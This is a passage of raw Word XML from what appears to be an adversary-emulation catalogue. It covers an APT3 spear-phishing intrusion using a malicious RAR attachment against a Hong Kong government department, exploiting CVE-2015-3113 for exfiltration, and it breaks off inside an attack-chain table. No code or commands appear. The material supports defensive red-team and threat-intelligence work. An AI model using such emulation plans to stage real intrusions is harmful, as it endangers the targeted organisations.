        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CBE486" w14:textId="4A2A1651" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00FC3056">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc153480860"/>
      <w:r>
        <w:t>T1566.001 – APT3 Emulation</w:t>
      </w:r>
      <w:r w:rsidR="00CF3F14">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00CF3F14" w:rsidRPr="00CF3F14">
        <w:t>Phase 1 – Initial Compromise</w:t>
      </w:r>
      <w:r w:rsidR="00193BD1">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00A84782" w:rsidRPr="00A84782">
        <w:t>Spear Phishing with Malicious RAR Attachment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="630A9A21" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00FC3056">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FC3056" w:rsidRPr="002D1D50" w14:paraId="254C28D4" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C7DFB3" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="002D1D50" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16DD9C3D" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="002D1D50" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBF8B34" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="00387DCC" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00015243" w:rsidRPr="00B857D7" w14:paraId="7E3433B2" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09581D73" w14:textId="77777777" w:rsidR="00015243" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146E86CB" w14:textId="076CB84C" w:rsidR="00015243" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F35CE31" w14:textId="77777777" w:rsidR="00015243" w:rsidRPr="00387DCC" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="5579CC67" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C705CF" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="007328DE" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F36CA43" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="007328DE" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">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23FA541E" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="00387DCC" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="79CA298E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA36C87" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64873A1A" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="007328DE" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32CCE717" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="00387DCC" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="63875F5D" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BA9225F" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02988509" w14:textId="33A49530" w:rsidR="00FC3056" w:rsidRDefault="0017202C" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Hong Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30345AAD" w14:textId="3F0E653B" w:rsidR="00FC3056" w:rsidRPr="00387DCC" w:rsidRDefault="0030038F" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D80AC0" w:rsidRPr="00B857D7" w14:paraId="05A479EB" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B624C53" w14:textId="77777777" w:rsidR="00D80AC0" w:rsidRDefault="00D80AC0" w:rsidP="00D80AC0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6516E850" w14:textId="3F5FE591" w:rsidR="00D80AC0" w:rsidRDefault="00D80AC0" w:rsidP="00D80AC0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADB2EF0" w14:textId="7F5DC924" w:rsidR="00D80AC0" w:rsidRPr="00387DCC" w:rsidRDefault="00D80AC0" w:rsidP="00D80AC0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="726722D6" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E5DFDA" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC95981" w14:textId="01D830EE" w:rsidR="00FC3056" w:rsidRDefault="00FC28F5" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597B8340" w14:textId="45D1FF84" w:rsidR="00FC3056" w:rsidRDefault="00FC28F5" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="5DA8CB0B" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B05DDB" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0D8CF8" w14:textId="0A04BBBC" w:rsidR="00FC3056" w:rsidRDefault="003D3FF9" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D3FF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2015-3113</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E61461" w14:textId="10E53A8E" w:rsidR="00FC3056" w:rsidRDefault="003D3FF9" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="003D3FF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In June, FireEye’s FireEye as a Service team in Singapore uncovered a phishing campaign exploiting an Adobe Flash Player zero-day vulnerability (CVE-2015-3113)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="2C519325" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F823DDD" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328C0B19" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41928052" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="6BD863CA" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D175031" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226C191B" w14:textId="6FFD3CAD" w:rsidR="00947A0B" w:rsidRDefault="00A307AF" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280BE838" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="1B5B0798" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6779261B" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB7BF0A" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D28A551" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3056" w:rsidRPr="00B857D7" w14:paraId="523796F6" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5086C59C" w14:textId="402C98C7" w:rsidR="00FC3056" w:rsidRDefault="00947A0B" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D57E356" w14:textId="6E47FB76" w:rsidR="00FC3056" w:rsidRDefault="00096E24" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB94924" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39A72DA4" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="00AC7A85" w:rsidRDefault="00FC3056" w:rsidP="00FC3056"/>
    <w:p w14:paraId="5D8EB0FC" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00FC3056">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10485" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="2463"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="708"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="12DE4941" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4628AD88" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="21960928" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="13EA19B4" w14:textId="552A98DF" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT3_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="16E8BD86" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="284DE88D" w14:textId="3C68E231" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3D37F7E2" w14:textId="0B91705E" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
